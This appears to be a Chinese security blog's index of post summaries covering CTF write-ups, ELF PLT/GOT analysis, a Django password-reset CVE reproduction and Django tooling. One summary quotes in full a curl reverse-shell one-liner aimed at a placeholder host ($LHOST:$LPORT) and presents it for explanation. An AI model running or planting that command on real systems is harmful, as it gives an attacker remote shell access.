写作令人愉快。写完后需要校对,这让我感到痛苦。校对枯燥乏味,还必须全神贯注,而且难免有所遗漏。我常常想,要是存在一个软件,能替我校对文稿,就再好不过。网上搜索发现,这类软件其实有不少。然而效果究竟如何,需要进行一些测试。
本文是 Google CTF 2018 Quals Beginners Quest 中的一道 Pwn 题目 Fridge todo list 的解题记录。
本文将对一个特意构造的、十分简单的、64 位的 ELF 文件的 PLT(Procedure Linkage Table)和 GOT(Global Offset Table)进行简单地静态分析。
本文简要解释了神奇的 curl 反弹 shell 命令 { curl -sNkT . https://$LHOST:$LPORT &-;} 3>&1|: 的工作原理。
本文记录了Hacker101 CTF中名为Encrypted Pastebin的题目的解法。该题要求技能为Web和Crypto,难度为Hard,共有4个flag,每个flag值9分。主要内容涉及padding oracle攻击、Python编程以及如何通过触发不同的报错获取关键信息。首发于先知社区。
本文详细记录了Django重置密码漏洞(CVE-2019-19844)的复现过程,简要分析了漏洞原理,讨论了攻击所需的条件。首发于安全客。
在学习PWK课程时我萌生了写一个能自动检测网站是否存在robots.txt的浏览器扩展的念头。完成PWK课程学习并顺利拿到OSCP认证后我花了些时间实现了这个想法。这篇文章介绍了这款浏览器扩展的安装、使用、配置和一些技术细节。
在Django中GenericIPAddressField可以存储一个IPv4或IPv6地址,但没有专门用来存储网段的字段。用字符串存储网段会丢失语义,如无法按包含的IP地址过滤网段。为解决此问题,我设计实现了一个支持所有数据库的专用于存储网段的字段IPNetworkField。这篇文章将介绍IPNetworkField的使用方法和实现原理。